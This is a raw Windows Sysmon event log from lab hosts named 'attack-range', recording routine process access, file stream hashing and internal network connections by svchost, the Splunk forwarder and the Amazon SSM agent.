10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0DCB-6216-ED03-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.651{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DCB-6216-ED03-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:51.652{4F8D34B0-0DCB-6216-ED03-000000003902}1988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:52.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=409FC8D43EAA6DAF98916E35502BB71E,SHA256=45E56EBA9D9A51AC83367B1F168036FB457ACFA472F338A4DCEE34A7AA17E468,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:52.519{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-118MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:52.392{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30C962683A8622D1E43380EF1FE7A80D,SHA256=A406093EEB5878342E217EA84DB905FBE20802E978F5284B54D68A3250E8F6BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:52.667{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C6BEC7D8D151D10B13690689D76F8F7,SHA256=8FDE7CFEEA6F2D821D7BA4941AC5A73032BDBAF4DE60D93D972237076F611D3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:53.870{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEE9C04D86BFBBF51937E136AC61CE82,SHA256=48E6A65F65A914BDF523E05F63E862C10840CBF860BD9F8989D5ED26024CA59B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:50.619{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53203-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:53.534{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-119MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:53.407{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB1B8EB77837AA7E799E399B357B3F81,SHA256=7716609B65314D550E91506A9FF74FC717E57EE7A6BF67081CFCDA028CD204AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:50.495{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51152-false10.0.1.12-8000- 10341000x8000000000000000284800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:53.251{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:53.251{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:53.251{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:54.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ED99A04D83A896DC75A395A311726F0,SHA256=C552582B47A626730646A1D1E4D2D4918A0577C98AC9C3E3CA2AF7820349451E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:54.410{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5A35FBE49E2659B60753936C66AF677,SHA256=3C13C65077A841CCB9FC73D93C580480FA49922D5BED466F1D2F965B933E75A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:55.979{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=853E05D3CF8B1D1B38296DC60C4C5FA2,SHA256=067824A74ABA14A4F124D4385C96DC3FE88A81F0D6F44D2A0001F13CD5B92967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:55.535{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=011F53ECF98DD7A46BF74E2F44A35A77,SHA256=B3CEF4A49B625BFABA4968AFE61E70F7B78F0B6FEC86CFA978CAEA4F91EF1CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:56.995{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B98BE80B7A57AC471982A87C602E5972,SHA256=76B236619F36C0D9280E5306C556C1AF3D2F1DA9A2E66127CC08D77A03CD7758,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:56.598{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66476C21E4B5B19A9FE78882C92036DF,SHA256=DC015C9F88E929C160C1842559F3441B5D7981A33F9C2F01B2E270E9CF43647B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:55.669{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53204-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:57.613{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82D23D750EFB0859C184BAE082BD01CB,SHA256=3F69BAEED0BCDFC225B625B146FA3C688F688EA0FA47C01D213DF323196A180E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:58.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16C28C69FC6C230EEFB07FA6A747D939,SHA256=49D58D3AF6B4A9109F696468C7AA0C094E864DA25F43674B6CAF0E059AFA8856,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:55.511{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51153-false10.0.1.12-8000- 23542300x8000000000000000213933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:58.042{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1271B9E5AB1CC656FE10BE7422CB5AFF,SHA256=AB14091BCB1DCB2F286FB3B3696074135B08BE1A1B117BBA6CD25B7F5A365B38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:59.645{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=667B1F99B05C5406581D72036C7DD5F2,SHA256=6ADBD85570C3CFA502545AD4BFD953289B3FF94CD107C3FF7C0D1D650E2E4FDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213935Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:59.120{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E79BB65802AD578B462FF1690F7B08,SHA256=55729B4F550BA7F7DD3FCE6C11A11BF2ECF74EC9E3982E55F93AEF6EA59F63C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:00.660{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFB61E247C57C6F99AFCEC8CB8B6CE79,SHA256=1E9DF52A582659AFE37957D757A969AE2D98E69AAB732D7E1FE93F03A4766142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213936Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:00.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF9FD88F72EF24C67202B06B41328C4B,SHA256=F615F3C67A5F796052F31C0D667DA8B6FE2BB4DBC20FD847B97E488DC619FB83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213937Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:35:01.338{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FE47E29F94D3387F61F44A191C7A2F,SHA256=E12D9AFC3BFBAF67279C004E09983FDACC7AB786131EB6D7E3147FE9D7865D45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:01.692{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC13003C2D834F032FA73FFAD176BEE2,SHA256=E1D1F830623AE3D144B4CFA029036AAD65C1D44528494C82BA1B4BA12D7010B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0DD6-6216-9804-000000003802}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:35:02.770{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|